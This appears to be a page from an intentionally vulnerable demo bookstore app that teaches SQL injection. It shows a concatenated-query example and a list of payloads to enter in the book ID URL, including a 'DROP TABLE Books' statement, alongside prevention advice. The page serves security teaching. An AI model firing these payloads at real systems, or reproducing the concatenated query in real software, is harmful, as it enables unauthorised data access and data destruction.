Book Details - SQL Injection Demo

SQL Injection is a code injection technique where malicious SQL statements are inserted into application entry points, allowing attackers to interfere with database queries.

How SQL Injection Works:

When user input is directly concatenated into SQL queries without proper sanitization:

# Vulnerable query example: SELECT * FROM Books WHERE Id = '" + userInput + "' # If user enters: 1' OR '1'='1 # Final query becomes: SELECT * FROM Books WHERE Id = '1' OR '1'='1'

Try These SQL Injection Payloads in the URL:

Replace the book ID in the URL with these payloads:

# Basic boolean-based injection 1' OR '1'='1 1' OR 1=1 -- 1' OR 1=1 # # Union-based injection 1' UNION SELECT 1,2,3,4,5 -- 1' UNION SELECT null,@version,null,null,null -- # Time-based blind injection 1' AND (SELECT COUNT(*) FROM sysobjects) > 0 WAITFOR DELAY '00:00:05' -- # Error-based injection 1' AND 1=CONVERT(int, (SELECT @version)) -- # Comment out rest of query 1'; DROP TABLE Books; -- 1'/**/OR/**/1=1--

SQL Injection Prevention:

  • Parameterized Queries: Use SQL parameters instead of string concatenation
  • Stored Procedures: Use properly implemented stored procedures
  • Input Validation: Validate and sanitize all user input
  • Escape Special Characters: Properly escape SQL special characters
  • Least Privilege: Use database accounts with minimal permissions
  • ORM Framework: Use Entity Framework or similar ORMs

Test This Vulnerability:

Try modifying the ID parameter in the URL: /Books/Details/{payload}

Title
Do Androids Dream of Electric Sheep?
Author
Philip K. Dick
Published Date
02/01/1968
ISBN
978-0345404473
Price
¤7.49